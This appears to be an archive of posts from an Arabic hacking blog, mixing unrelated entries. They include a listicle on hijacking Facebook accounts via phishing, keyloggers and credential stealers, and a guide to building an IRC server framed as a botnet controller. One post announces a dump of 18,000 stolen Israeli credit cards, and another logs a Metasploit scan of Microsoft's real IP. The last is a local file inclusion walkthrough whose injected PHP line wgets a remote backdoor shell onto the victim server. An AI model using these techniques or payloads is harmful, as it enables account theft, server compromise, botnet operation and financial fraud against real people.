الأحد، 27 سبتمبر 2015

Top 10 Ways How Hackers Can Hack Facebook Accounts

Facebook is one of the most widely used social networking site with more than 750 million users, as a reason if which it has become the number 1 target of hackers, I have written a couple of post related to facebook hacking here at RHA, In my previous post which I wrote in 2010 related to facebook hacking and security 4 ways on How to hack facebook password, I mentioned the top methods which were used by hackers to hack facebook accounts, however lots of things have changed in 2012, Lots of methods have went outdated or have been patched up by facebook and lots of new methods have been introduced, So in this post I will write the top 10 methods how hackers can hack facebook accounts in 2011.
So here are the top 10 methods which have been the most popular:

1. Facebook Phishing 

Phishing still is the most popular attack vector used for hacking facebook accounts, There are variety of methods to carry out phishing attack, In a simple phishing attacks a hacker creates a fake login page which exactly looks like the real facebook page and then asks the victim to login into that page, Once the victim logins through the fake page the victims “Email Address” and “Password” is stored in to a text file, The hacker then downloads the text file and get’s his hands on the victims credentials.
2. Keylogging 

Keylogging, according to me is the easiest way to hack a facebook password, Keylogging sometimes can be so dangerous that even a person with good knowledge of computers can fall for it. A keylogger is basically a small program which once is installed on victims computer will record every thing which victim types on his/her computer. The logs are then send back to the attacker by either FTP or directly to hackers email address. I have dedicated a half of my newsest book “An introduction to keyloggers, RATS And Malware” to this topic.
Ethical Hacking Book
3. Stealers 
Almost 80% percent people use stored passwords in their browser to access the facebook, This is is quite convenient but can sometimes be extremely dangerous, Stealers are software’s specially designed to capture the saved passwords stored in the victims browser, Stealers once FUD can be extremely powerful. If you want to how stealers work and how you can set up your own one?, Kindly refer the book above.
4. Session Hijacking
Session Hijacking can be often very dangerous if you are accessing Facebook on a http:// connection, In a Session Hijacking attack a hacker steals the victims browser cookie which is used to authenticate a user on a website and uses to it to access victims account, Session hijacking is widely used on Lan’s. I have already written a three part series on How session hijacking works? and also a separate post on Facebook session hijacking.
5. Sidejacking With Firesheep
Sidejacking attack went common in late 2010, however it’s still popular now a days, Firesheep is widely used to carry out sidejacking attacks, Firesheep only works when the attacker and victim is on the same wifi network. A sidejacking attack is basically another name for http session hijacking, but it’s more targeted towards wifi users.
6. Mobile Phone Hacking
Millions of Facebook users access Facebook through their mobile phones. In case the hacker can gain access to the victims mobile phone then he can probably gain access to his/her Facebook account. Their are lots of Mobile Spying softwares used to monitor a Cellphone.
7. DNS Spoofing 
If both the victim and attacker are on the same network, an attacker can use a DNS spoofing attack and change the original facebook.com page to his own fake page and hence can get access to victims facebook account

الخميس، 17 يوليو 2014

An Overview of Tool Set in Kali Linux


Kali Linux an Overview of Toolset

Kali Linux is a Linux Distribution used for Penetration Testing and Security auditing, It is customized by adding more than 400 tools. These tools is categorized in multiple groups which can be seen inside Kali Linux drop down menu under Application menu available on top-left corner of Kali Linux.

Information Gathering:

In this group all the tools are Reconnaissance tools used to gather information and Data from target machine, devices, and network. These are able to find the open ports, running services, Operating system, and more on the target machine. To find used protocol from the identifying device is very useful for Penetration Tester.
information gathering tools in kali linux

Vulnerability Analysis:

Tools from this group focus on evaluating target system for Vulnerabilities. These tools is run against systems found using the Information Gathering Reconnaissance tools. These tools are used to find vulnerabilities for exploitation and prepare a platform for exploitation.
Vulnerability assessment in kali linux

Web Applications:

Tools from in this section used to find and exploit vulnerabilities in Web Server, Web site, and Web Application. Many of tools we discussed in the Web Penetration Testing category. However Web Application section do not always refer lunch attacks against web servers, they may be web-based tools for networking services is useful for Web Penetration testing. For Example, Web proxies are available in this section.
Web applications in kali LInux

Password Attacks:

This group of tools simply make deal with brute force or the offline computation of password. Identify, Find, and crack the hashes is main motive of this section. Some tools from this section is used for online attack and some for offline attack.
Password Attacks tools in Kali Linux

Wireless Attacks:

This section of tools used to exploit vulnerabilities for wireless protocols. 802.11 tool are found under this section, including tools for example aircrack, airmon, and wireless password cracking tools. The additional tools in this section are related with RFID and Bluetooth vulnerabilities as well. Some tools used to put wireless adapter on promiscuous mode.
Password Attacks tools in Kali Linux

Exploitation Tools:

These are tools used to exploit vulnerabilities discovered in system. These vulnerabilities is discovered during the Vulnerability Assessment of a target. In this group lot of tools and also some exploitation framework. Framework is the combination of multiple tools and scripts.
Exploitaion tools in Kali Linux

Sniffing and spoofing:

These tools are used for capture, manipulate, and craft network packets. In some cases some tools are used for spoofing MAC, IP Address and Web sites.
sniffing and spoofing

Maintaining Access:

Keeping up Access tools are utilized once a decent footing is built into a target Network or system. It is regular to discover compromised systems having multiple snares over to the attacker to give option courses in the occasion a vulnerability that is utilized by the attacker is discovered and remediated.
Maintaining access

Reverse Engineering:

These tools are utilized to disable an executable what’s more debug programs and applications. The reason for reverse engineering is breaking down how a system was produced so it might be duplicated, changed, or lead to improvement of different programs. Reverse Engineering is likewise utilized for malware investigation to figure out what an executable does or via scientists to endeavor to discover vulnerabilities in programming applications.
Reverse Engineering

Stress Testing:

Stress Testing tools are utilized to assess the amount information a system can deal with. Undesired results could be gotten from over-burdening systems, for example, creating a gadget controlling system communication to open all communication channels or a framework closing down (otherwise called a DOS attack ).
Stress Testing tools in Kali Linux

Hardware Hacking:

in this section tools are used for controlling small electronic devices such as mobiles. Available tools are related with android which classified as mobile, and Ardunio tools.
Hardware Hacking

Forensics :

Tools are this section is used for monitor, analyze computers, network traffics and programs etc.
Forensics tools in Kali Linux

Reporting Tools:

These tools are used to send information to the targeted organization found during the Penetration Testing.
Reporting tools in kali linux

System Services:

This is the place where Kali services can be disabled and enabled. Services for example BeEF, Dardis, HTTP, Metasploit, MYSQL, and SSH.
System Services in Kali Linux

الأحد، 20 أكتوبر 2013

How to setup your own IRC Botnet

 I will be showing you how to set up an IRC off your VPS and or Dedi. I will be using CentOS 6, which I use on all my Dedis, I highly recommend it. So, lets get started. This guide will be showing you how to set up a IRC, with any max connection w/o Unknowns Modded IRCd.
1. Update
Code:
yum update

[Image: f2d2098f9386a8658cd746a20f43dcb8.png?1356880049]
I have already updated mine.

2. Install gcc
Code:
yum install gcc

[Image: da2709e5ae2c7d65472613baf0a3fa1a.png?1356880099]
I have mine already installed to the newest version.

3. Download UnrealIRCD 3.2
Code:
wget http://www.unrealircd.com/downloads/Unreal3.2.9.tar.gz

[Image: 29894a216217165954a711712521da2a.png?1356880197]
4. Extract the files
Code:
tar xf Unreal3.2.9.tar.gz

[Image: 33d821dce8d955fcae3303bac6871e35.png]
5. If you plan on having more than 1024 users/bots, upgrade the setsize
Code:
nano /usr/include/bits/typesizes.h
Scroll down to "#define __FD_SETSIZE 1024" and change 1024 to 12000 (or how much you plant to old). Save the file.(Ctrl & X, Y, Enter)

[Image: 8cd58226cd1c97591dbcffb0bf9464fc.png?1356880332]
6.Enter Unreal folder:
Code:
cd Unreal3.2

[Image: 99c72ca76a4cac6e9b98e8f9dc572256.png?1356880433]
7.Enter Unreal config
Code:
./Config
Hold enter until it says 100% on the bottom or when it says "[Enter to continue]"
Press enter until you get to "How many file descriptors (or sockets) can the IRCd use? [1024] ->" Type 12000 and press enter for the rest

[Image: 4e1c34bf0f308007977d7098f1504da9.png?1356880498]
8. Copy and paste this code from the pastebin link I provide, it is the unrealircd.conf. Click Here
Type, nano unrealircd.conf
Then paste the code from pastebin, if you use Putty right click to paste.
After, edit to your liking.

** MAKES SURE YOU CHANGE THE FIRST MAX CLIENTS TO THE LIMIT YOU PUT WHEN YOU CONFIGURED

[Image: b7d2dee45f7a9074867e853695e9b76c.png?1356882021]
** Under the oper block, I would add these lines

[Image: bb0ad3b7fb51372639304ea58cd21a67.png?1356880912]
add
Code:
global;
services-admin;
can_rehash;
can_die;
can_restart;
helpop;
can_wallops;
can_globops;
can_localroute;
can_globalroute;
can_localkill;
can_globalkill;
can_kline;
can_gzline;
can_gkline;
can_unkline;
can_localnotice;
can_globalnotice;
netadmin;
can_zline;
get_umodew;
get_host;
can_override;
Should look like this when you are done.
[Image: 88da9847ee163130820ebb5306f53b4e.png?1356881206]
** Save the file (Ctrl & X, Y, Enter)
9)type: make
[Image: 41826990455cab5906fa3a7c806134af.png?1356881307]
10)Start your IRC
** If you get an error saying could not find, ircd.motd.fr, ircd.rules.fr, ircd.log. | Just type: touch ircd.motd.fr ircd.rules.fr ircd.log
Type..
Code:
ulimit -n 12000;./unreal start
[Image: d5b2b966dd4e9780a0b1aa6ccb02d2ce.png?1356882098]
You will now be able to connect to your IRC using a client like "mIRC" for Windows, "LimeChat" for Mac, or "KVIrc" for Linux."

الأحد، 21 أبريل 2013

فريق الكوبرا يلدغ اكبر موقع هكر داعر v4-team.com


قام فريق الكوبرا منذ صباح اليوم بالاعداد لهجوم كبير للموقع المعروف بالقذارة.وسوء الادارة ولدينا معلومات اكيده ان الادارة لغمت سكربت بثغرات الجافا لاختراق الزوار والاعضاء.والهجوم تدميرى حيث سقط السيرفر رغما عن الحماية



go home botnet cobra-team



خخخخخخخ اخر لحظات ما قبل سقوط امان الجرب
هذى مواضيعهم التافهة قالو ايه بدأ الهجوم خخخخخ وبايه بسكربتات لاتسقط ذبابة

الأحد، 7 أبريل 2013

hacked israeli credit card list by cobra-team

------------- Hey BROTHERS....
------------- Here is a list of hacked (Visa, Mastercard ...) 18.000 credit cards
------------- FUCK ISRAEL ..... SUPPORT PALESTINE !!! Love PALESTINE ..... 

 http://pastebin.com/gYsGhibD

السبت، 15 ديسمبر 2012

WMAP WEB SCANNER METASPLOIT

ur0b0r0x@consolex_ /opt/metasploit-4.4.0/msf3 $ msfconsole

     ,           ,
    /             \
   ((__---,,,---__))
      (_) O O (_)_________
         \ _ /            |\
          o_o \   M S F   | \
               \   _____  |  *
                |||   WW|||
                |||     |||


       =[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 951 exploits - 506 auxiliary - 152 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops

msf > db_connect -y /opt/metasploit-4.4.0/config/database.yml
msf > load wmap

.-.-.-..-.-.-..---..---.
| | | || | | || | || |-'
`-----'`-'-'-'`-^-'`-'
[WMAP 1.5.1] ===  et [  ] metasploit.com 2012
[*] Successfully loaded plugin: wmap

msf > wmap_sites -a www.microsoft.com,http://65.55.58.201/
[*] Site created.
msf > wmap_sites -l
[*] Available sites
===============

 Id  Host             Vhost                Port  Proto  # Pages  # Forms
 --  ----             -----                ----  -----  -------  -------
 0   65.55.58.201     www.microsoft.com    80    http   0        0


msf > wmap_sites -s 0 1
    [www.microsoft.com] (65.55.58.201)
msf > wmap_targets -t microsoft.com,http://65.55.58.201/
msf > set DOMIAN www.microsoft.com
DOMIAN => www.microsoft.com
msf > wmap_targets  -d 0
[*] Loading www.microsoft.com,http://65.55.58.201:80/.
msf > wmap_targets  -l
[*] Defined targets
===============

     Id  Vhost              Host          Port  SSL    Path
     --  -----              ----          ----  ---    ----
     0   www.microsoft.com  65.55.58.201  80    false    /


msf > wmap_run -t
[*] Testing target:
[*]     Site: www.microsoft.com (65.55.58.201)
[*]     Port: 80 SSL: false
============================================================
[*] Testing started. 2012-09-17 17:48:50 -0500
[*] Loading wmap modules...

[*] 38 wmap enabled modules loaded.
[*]
=[ SSL testing ]=
============================================================
[*] Target is not SSL. SSL modules disabled.
[*]
=[ Web Server testing ]=
============================================================
[*] Module auxiliary/scanner/http/http_version
[*] Module auxiliary/scanner/http/open_proxy
=[ File/Dir testing ]=
============================================================
[*] Module auxiliary/scanner/http/backup_file
[*] Module auxiliary/scanner/http/brute_dirs
[*] ETC ETC ETC ETC ETC.....
=[ Unique Query testing ]=
============================================================
[*] Module auxiliary/scanner/http/blind_sql_query
[*] Module auxiliary/scanner/http/error_sql_injection
[*] ETC ETC ETC ETC ETC.....

 
msf > wmap_run -e
[*] Using ALL wmap enabled modules.
[*] Testing target:
[*]     Site: www.microsoft.com (65.55.58.201)
[*]     Port: 80 SSL: false
============================================================
[*] Testing started. 2012-09-17 18:03:07 -0500
[*]
=[ SSL testing ]=
============================================================
[*] Target is not SSL. SSL modules disabled.
[*]
=[ Web Server testing ]=
============================================================
[*] Module auxiliary/scanner/http/http_version

[*] 65.55.58.201:80 Microsoft-IIS/7.5 ( Powered by ASP.NET, 301-http://www.microsoft.com )
[*] ETC ETC ETC......

msf > hosts -c address,svcs,vulns

Hosts
=====
address        svcs  vulns
-------        ----  -----
65.55.58.201    1     1
msf > vulns
[*] Time: 2012-09-17 18:05:49 UTC Vuln: host=65.55.58.201 port=80 proto=tcp name=auxiliary/scanner/http/options refs=CVE-2005-3398,CVE-2005-3498,OSVDB-877,BID-11604,BID-9506,BID-9561

الثلاثاء، 11 ديسمبر 2012

Local File Inclusion Vulnerability Demonstration - Web Hacking

Local file inclusion is a very popular web application attack, It was very common few years back. However now a days you will rarely find websites vulnerable to this attack. However a single vulnerability can result in getting your website compromised. 

Here are some of the common parameters/dorks which are vulnerable to local file inclusion or remote file inclusion attacks.

index.php?index2=
index.php?homepage=
index.php?page=
 
Requirements:

1) A Vulnerable Website
2) Remote shell ( http://www.sh3ll.org/egy.txt )
3) User-Agent switcher ( https://addons.mozilla.org/en-US/firefox...-switcher/ )
4) Mozilla Firefox

The first thing which a hacker will do while finding a LFI vulnerability is to locate the /etc/passwd file. This file indicates that a local file inclusion vulnerability is present in the website. The image below explains the whole story “root” is the username, followed by “x” which happens to be the password, however here it’s shadowed, which means that it’s present is /etc/shadow file. Which is only accessible when you have root privileges.



Next the hacker will check for /proc/self/environ. So change your path to /proc/self/environ/. The /proc/self/environ/ page should look something like this if the file exists, not all sites have it.


Once the local file inclusion vulnerability has been identified , the hacker will try to perform remote code execution and try to some how to further acesss. This can be done by uploading a PHP backdoor. For that purpose a commonly used tool is Useragent switcher. Which can be downloaded from the link above. 


The hacker edits the useragent and changes code inside to the user agent to the following:

<?php phpinfo();?>

Select your User-Agent in Tools > Default User Agent > PHP Info (Or whatever you User Agent is called)



After refreshing the website, He then searches for the keyword "disable_functions" (Ctrl+F Search function)

disable_functions | no value | no value


The above function tells us that website is vulnerable to remote code execution and now we can upload the PHP backdoor. On the finding that the website is vulnerable he then tries to upload the shell by using the following command:


<?exec('wget http://www.sh3ll.org/egy.txt -O shell.php');?>

Where the above code uploads a PHP backdoor in a text form and later renames it to .php. Now the shell has been successfully uploaded. Once the PHP backdoor has been uploaded it will look like the following:

Feel free to query for any issue.